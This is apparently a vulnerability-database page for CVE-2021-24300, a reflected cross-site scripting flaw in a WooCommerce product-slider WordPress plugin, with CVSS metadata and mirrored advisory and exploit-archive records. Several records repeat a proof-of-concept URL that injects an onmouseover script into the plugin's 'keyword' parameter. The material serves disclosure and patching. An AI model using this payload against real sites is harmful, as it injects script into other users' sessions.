Description
The slider import search feature of the PickPlugins Product Slider for WooCommerce WordPress plugin before 1.13.22 did not properly sanitised the keyword GET parameter, leading to reflected Cross-Site Scripting issue
Affected Software
Related
{"id": "CVE-2021-24300", "vendorId": null, "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-24300", "description": "The slider import search feature of the PickPlugins Product Slider for WooCommerce WordPress plugin before 1.13.22 did not properly sanitised the keyword GET parameter, leading to reflected Cross-Site Scripting issue", "published": "2021-05-24T11:15:00", "modified": "2021-05-28T18:44:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "accessVector": "NETWORK", "accessComplexity": "MEDIUM", "authentication": "NONE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "NONE", "baseScore": 4.3}, "severity": "MEDIUM", "exploitabilityScore": 8.6, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": true}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-24300", "reporter": "contact@wpscan.com", "references": ["https://wpscan.com/vulnerability/5fbbc7ad-3f1a-48a1-b2eb-e57f153eb837"], "cvelist": ["CVE-2021-24300"], "immutableFields": [], "lastseen": "2022-03-23T14:51:18", "viewCount": 17, "enchantments": {"dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:50704"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:165805"]}, {"type": "wpexploit", "idList": ["WPEX-ID:5FBBC7AD-3F1A-48A1-B2EB-E57F153EB837"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:5FBBC7AD-3F1A-48A1-B2EB-E57F153EB837"]}, {"type": "zdt", "idList": ["1337DAY-ID-37303"]}], "rev": 4}, "score": {"value": 2.8, "vector": "NONE"}, "twitter": {"counter": 4, "modified": "2021-05-28T07:26:00", "tweets": [{"link": "https://twitter.com/threatintelctr/status/1398353505736404993", "text": " NEW: CVE-2021-24300 The slider import search feature of the PickPlugins Product Slider for WooCommerce WordPress plugin before 1.13.22 did not properly sanitised the keyword GET parameter, leading to reflected ... (click for more) Severity: MEDIUM https://t.co/8K9q85j6Jz?amp=1"}, {"link": "https://twitter.com/threatintelctr/status/1398353505736404993", "text": " NEW: CVE-2021-24300 The slider import search feature of the PickPlugins Product Slider for WooCommerce WordPress plugin before 1.13.22 did not properly sanitised the keyword GET parameter, leading to reflected ... (click for more) Severity: MEDIUM https://t.co/8K9q85j6Jz?amp=1"}, {"link": "https://twitter.com/WolfgangSesin/status/1398377426237988867", "text": "New post from https://t.co/uXvPWJy6tj?amp=1 (CVE-2021-24300 (product_slider_for_woocommerce)) has been published on https://t.co/zlzUHqBOsM?amp=1"}, {"link": "https://twitter.com/www_sesin_at/status/1398378573933826060", "text": "New post from https://t.co/9KYxtdZjkl?amp=1 (CVE-2021-24300 (product_slider_for_woocommerce)) has been published on https://t.co/HtwRnx41KE?amp=1"}]}, "backreferences": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:50704"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:165805"]}, {"type": "wpexploit", "idList": ["WPEX-ID:5FBBC7AD-3F1A-48A1-B2EB-E57F153EB837"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:5FBBC7AD-3F1A-48A1-B2EB-E57F153EB837"]}, {"type": "zdt", "idList": ["1337DAY-ID-37303"]}]}, "exploitation": null, "vulnersScore": 2.8}, "_state": {"dependencies": 0}, "_internal": {}, "cna_cvss": {"cna": null, "cvss": {}}, "cpe": [], "cpe23": [], "cwe": ["CWE-79"], "affectedSoftware": [{"cpeName": "pickplugins:product_slider_for_woocommerce", "version": "1.13.22", "operator": "lt", "name": "pickplugins product slider for woocommerce"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:pickplugins:product_slider_for_woocommerce:1.13.22:*:*:*:*:wordpress:*:*", "versionEndExcluding": "1.13.22", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://wpscan.com/vulnerability/5fbbc7ad-3f1a-48a1-b2eb-e57f153eb837", "name": "https://wpscan.com/vulnerability/5fbbc7ad-3f1a-48a1-b2eb-e57f153eb837", "refsource": "CONFIRM", "tags": ["Exploit", "Third Party Advisory"]}]}
{"patchstack": [{"lastseen": "2022-06-01T19:32:44", "description": "Reflected Cross-Site Scripting (XSS) vulnerability discovered by 0xB9 in WordPress Product Slider for WooCommerce plugin (versions <= 1.13.21).\n\n## Solution\n\n\r\n Update the WordPress Product Slider for WooCommerce plugin to the latest available version (at least 1.13.22).\r\n ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-04-13T00:00:00", "type": "patchstack", "title": "WordPress Product Slider for WooCommerce plugin <= 1.13.21 - Reflected Cross-Site Scripting (XSS) vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24300"], "modified": "2021-04-13T00:00:00", "id": "PATCHSTACK:E6DF01F2A303308001792FA0BC062C13", "href": "https://patchstack.com/database/vulnerability/woocommerce-products-slider/wordpress-product-slider-for-woocommerce-plugin-1-13-21-reflected-cross-site-scripting-xss-vulnerability", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "wpvulndb": [{"lastseen": "2021-08-24T13:51:58", "description": "The slider import search feature of the plugin settings did not properly sanitised the keyword GET parameter, leading to reflected Cross-Site Scripting issue\n\n### PoC\n\nhttps://example.com/wp-admin/edit.php?post_type=wcps&page;=import_layouts&keyword;=\"onmouseover=alert(1);//\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 2.7}, "published": "2021-05-06T00:00:00", "type": "wpvulndb", "title": "PickPlugins Product Slider for WooCommerce < 1.13.22 - Reflected Cross-Site Scripting (XSS)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24300"], "modified": "2021-05-07T07:01:36", "id": "WPVDB-ID:5FBBC7AD-3F1A-48A1-B2EB-E57F153EB837", "href": "https://wpscan.com/vulnerability/5fbbc7ad-3f1a-48a1-b2eb-e57f153eb837", "sourceData": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "packetstorm": [{"lastseen": "2022-02-10T00:00:00", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 2.7}, "published": "2022-02-02T00:00:00", "type": "packetstorm", "title": "WordPress Product Slider For WooCommerce 1.13.21 Cross Site Scripting", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24300"], "modified": "2022-02-02T00:00:00", "id": "PACKETSTORM:165805", "href": "https://packetstormsecurity.com/files/165805/WordPress-Product-Slider-For-WooCommerce-1.13.21-Cross-Site-Scripting.html", "sourceData": "`# Exploit Title: WordPress Plugin Product Slider for WooCommerce 1.13.21 - Cross Site Scripting (XSS) \n# Date: 3/16/2021 \n# Author: 0xB9 \n# Software Link: https://wordpress.org/plugins/woocommerc...ts-slider/ \n# Version: 1.13.21 \n# Tested on: Windows 10 \n# CVE: CVE-2021-24300 \n \n1. Description: \nThis plugin is a easy carousel slider for WooCommerce products. The slider import search feature is vulnerable to reflected cross-site scripting. \n \n2. Proof of Concept: \nwp-admin/edit.php?post_type=wcps&page=import_layouts&keyword=\"onmouseover=alert(1);// \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/165805/wppsw11321-xss.txt", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "zdt": [{"lastseen": "2022-02-10T00:00:00", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 2.7}, "published": "2022-02-02T00:00:00", "type": "zdt", "title": "WordPress Product Slider for WooCommerce 1.13.21 Plugin - Cross Site Scripting Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24300"], "modified": "2022-02-02T00:00:00", "id": "1337DAY-ID-37303", "href": "https://0day.today/exploit/description/37303", "sourceData": "# Exploit Title: WordPress Plugin Product Slider for WooCommerce 1.13.21 - Cross Site Scripting (XSS)\n# Author: 0xB9\n# Software Link: https://wordpress.org/plugins/woocommerc...ts-slider/\n# Version: 1.13.21\n# Tested on: Windows 10\n# CVE: CVE-2021-24300\n\n1. Description:\nThis plugin is a easy carousel slider for WooCommerce products. The slider import search feature is vulnerable to reflected cross-site scripting.\n\n2. Proof of Concept:\nwp-admin/edit.php?post_type=wcps&page=import_layouts&keyword=\"onmouseover=alert(1);//\n", "sourceHref": "https://0day.today/exploit/37303", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "wpexploit": [{"lastseen": "2021-08-24T13:51:58", "description": "The slider import search feature of the plugin settings did not properly sanitised the keyword GET parameter, leading to reflected Cross-Site Scripting issue\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 2.7}, "published": "2021-05-06T00:00:00", "type": "wpexploit", "title": "PickPlugins Product Slider for WooCommerce < 1.13.22 - Reflected Cross-Site Scripting (XSS)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24300"], "modified": "2021-05-07T07:01:36", "id": "WPEX-ID:5FBBC7AD-3F1A-48A1-B2EB-E57F153EB837", "href": "", "sourceData": "https://example.com/wp-admin/edit.php?post_type=wcps&page=import_layouts&keyword=\"onmouseover=alert(1);//", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "exploitdb": [{"lastseen": "2022-05-13T17:33:15", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2022-02-02T00:00:00", "type": "exploitdb", "title": "WordPress Plugin Product Slider for WooCommerce 1.13.21 - Cross Site Scripting (XSS)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2021-24300", "CVE-2021-24300"], "modified": "2022-02-02T00:00:00", "id": "EDB-ID:50704", "href": "https://www.exploit-db.com/exploits/50704", "sourceData": "# Exploit Title: WordPress Plugin Product Slider for WooCommerce 1.13.21 - Cross Site Scripting (XSS)\r\n# Date: 3/16/2021\r\n# Author: 0xB9\r\n# Software Link: https://wordpress.org/plugins/woocommerc...ts-slider/\r\n# Version: 1.13.21\r\n# Tested on: Windows 10\r\n# CVE: CVE-2021-24300\r\n\r\n1. Description:\r\nThis plugin is a easy carousel slider for WooCommerce products. The slider import search feature is vulnerable to reflected cross-site scripting.\r\n\r\n2. Proof of Concept:\r\nwp-admin/edit.php?post_type=wcps&page=import_layouts&keyword=\"onmouseover=alert(1);//", "sourceHref": "https://www.exploit-db.com/download/50704", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}]}
CVE-2021-24300
